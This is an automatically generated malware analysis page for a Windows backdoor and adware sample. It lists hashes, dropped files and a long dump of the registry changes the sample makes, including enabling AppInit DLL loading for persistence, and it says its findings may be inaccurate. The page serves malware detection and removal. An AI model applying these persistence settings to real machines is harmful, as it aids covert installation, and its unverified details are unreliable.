Gen.Variant.Adware.Kazy.554588_ef6a1ae35b

by malwarelabrobot on May 11th, 2015 in Malware Descriptions.

not-a-virus:HEUR:AdWare.Win32.Generic (Kaspersky), Gen:Variant.Adware.Kazy.554588 (B) (Emsisoft), Gen:Variant.Adware.Kazy.554588 (AdAware), Backdoor.Win32.PcClient.FD (Lavasoft MAS)
Behaviour: Backdoor, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: ef6a1ae35ba68aaa997970227aec7646
SHA1: f40039906054085a6eb9b435b9e11857fe34a5cf
SHA256: f950cdd9b924d8356e25c5fb258b9156267d9ff0a372ad7db2dc6cd0ec232675
SSDeep: 49152:5uD50 jdzURmF63IonK3ef6RlPCkWLz6XHXWRHG7t00FU62fWLtw1i2tRf :5K jdzUmF64Q6RlPCrAGRAtpGEw1i2D
Size: 2536960 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-01-27 11:51:38
Analyzed on: WindowsXP SP3 32-bit


Summary:

Backdoor. Malware that enables a remote control of victim's machine.

Payload

No specific payload has been found.

Process activity

The Backdoor creates the following process(es):

%original file name%.exe:1140
rundll32.exe:1764
rundll32.exe:1116

The Backdoor injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1140 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Program Files%\TrimInstance\TrimInstance.dll (86905 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (7972 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (0 bytes)

Registry activity

The process %original file name%.exe:1140 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"fe94ce1e" = "V/////%%"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"c6c5dd44" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"bbf88800" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"usr.0" = "LwAzvySUMOQIKEG xz"
"usr.1" = "PJiVPRFHwysurpnikg"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"e46c271e" = "///%"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995]
"date" = "1431203279"
"LRTS" = "0"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"Mode" = "4026531840"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"72758a5d" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"dbaf3ce3" = "/P////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"7367429f" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\00000000]
"370856c7" = ""

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"LRTS" = "0"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"a0743acc" = "N/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"8b9e4cbc" = "V/////%%"
"72758a5d" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"1520c6f1" = "V/////%%"
"2e22d94e" = "///%"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"svpath" = "c:\Program Files\TrimInstance\TrimInstance.dll"

[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"n" = "1"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"c99a5f5c" = "///%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 28 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"340d3099" = "/P////%%"

[HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}]
"n" = "1"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"

"7f69fa1f" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "1"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"fe94ce1e" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"iiid" = "1"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995]
"usr.1" = "PJiVPRFHwysurpnikg"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"2d71d5ab" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{bca22949}]
"InstallDate" = "20140118"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"data.1" = "S28upk9U/ZkthtvqomdKaWtIuKFCQSQET9eNel9Ce1rl0i3sud2ScYgde35kEwtNSvJc8ZsOMO9gK6RJH1Fc4ge6Cj5U"
"data.0" = "Xa0RL6a5aR76/WG xzI IsMC2TiyhIA0hiHq0mxF0j/VZU2ROBlA6JIfRxdUkflc 4n/oO5wy"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"340d3099" = "///%"
"dbaf3ce3" = "/P////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"48bd1aff" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"c6c5dd44" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\00000000]
"3efeb33e" = ""

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"414bc593" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"38583bc3" = "Ml/2/CF/M//g/CZ////%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"340d3099" = "/P////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"0e93c3f3" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"uuid" = "16675769074180770034"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995]
"iiid" = "1"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"27ddcf6f" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{bca22949}]
"NoModify" = "1"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"27ddcf6f" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"c99a5f5c" = "///%"
"f6ad6fa6" = "V/////%%"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"date" = "1431203279"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995]
"svi" = "0"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"48bd1aff" = "V/////%%"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"2e22d94e" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995]
"svn" = "TrimInstance"
"data.1" = "S28upk9U/ZkthtvqomdKaWtIuKFCQSQET9eNel9Ce1rl0i3sud2ScYgde35kEwtNSvJc8ZsOMO9gK6RJH1Fc4ge6Cj5U"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"fe94ce1e" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"587b5709" = "V/////%%"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995]
"svx" = ""

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"
"2d71d5ab" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{bca22949}]
"UninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\TRIMIN~1\TRIMIN~1.DLL,_uninstall /un"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995]
"svt" = "1431210485"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"
"f2c53c49" = "UlAr/XJ/c//k////"
"2d71d5ab" = "V/////%%"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"7367429f" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"65114b36" = "VP/l////"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{bca22949}]
"CategoryName" = ""

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"51d2f2ea" = "K/Af/Xt/aPAS/X2/blAh/XD/axAs/XJ////%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\00000000]
"370856c7" = ""

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"c5705860" = "Vx////%%"
"0dc3ee96" = "/P////%%"
"6185d035" = "Vx/2/Cx/V//l////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"3c09c42b" = "///%"
"48bd1aff" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 8B E7 DD C8 C2 0B 5F 90 19 AF B0 E0 0C EB BB"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"Install_Dir" = "%Program Files%\TrimInstance"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"f0bf0bde" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"iiid" = "1"
"State" = "0"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"d1abcdb6" = "///%"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995]
"State" = "0"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"d1abcdb6" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"0c230bcb" = "///%"
"f2c53c49" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"e46c271e" = "///%"
"a2e3b941" = "///%"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995]
"Version" = "22022131"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"LRTS" = "0"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"27ddcf6f" = "///%"
"7f69fa1f" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"a0743acc" = "N/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"8b9e4cbc" = "V/////%%"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"51d2f2ea" = "K/Af/Xt/aPAS/X2/blAh/XD/axAs/XJ////%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"usr.1" = "PJiVPRFHwysurpnikg"
"usr.0" = "LwAzvySUMOQIKEG xz"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"a2e3b941" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"e46c271e" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"6185d035" = "Vx/2/Cx/V//l////"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"
"a0743acc" = "N/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"a1dcff5b" = "V/////%%"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\00000000]
"3efeb33e" = ""

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"7367429f" = "///%"
"0c230bcb" = "///%"
"3c09c42b" = "///%"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995]
"uuid" = "16675769074180770034"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"51d2f2ea" = "K/Af/Xt/aPAS/X2/blAh/XD/axAs/XJ////%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"Mode" = "4026531840"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"bbf88800" = "///%"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"bca22949" = "%Program Files%\TrimInstance\TrimInstance.dll"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{bca22949}]
"NoRepair" = "1"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"dlpath" = "c:\progra~1\trimin~1\trimin~1.dll"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995]
"Mode" = "4026531840"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"uuid" = "16675769074180770034"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"f6ad6fa6" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{bca22949}]
"Publisher" = "Software Publisher"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"6185d035" = "Vx/2/Cx/V//l////"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\00000000]
"370856c7" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"0dc3ee96" = "/P////%%"
"f0bf0bde" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"data.0" = "Xa0RL6a5aR76/WG xzI IsMC2TiyhIA0hiHq0mxF0j/VZU2ROBlA6JIfRxdUkflc 4n/oO5wy"
"data.1" = "S28upk9U/ZkthtvqomdKaWtIuKFCQSQET9eNel9Ce1rl0i3sud2ScYgde35kEwtNSvJc8ZsOMO9gK6RJH1Fc4ge6Cj5U"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"414bc593" = "///%"
"c5705860" = "Vx////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"bbf88800" = "///%"
"38583bc3" = "Ml/2/CF/M//g/CZ////%"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{bca22949}]
"Cache" = "9428760297565573948"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"414bc593" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"340d3099" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"svi" = "0"
"svn" = "TrimInstance"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\00000000]
"3efeb33e" = ""

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"f6ad6fa6" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"c5705860" = "Vx////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"svx" = ""

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"

"a1dcff5b" = "V/////%%"
"38583bc3" = "Ml/2/CF/M//g/CZ////%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"svt" = "1431210485"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
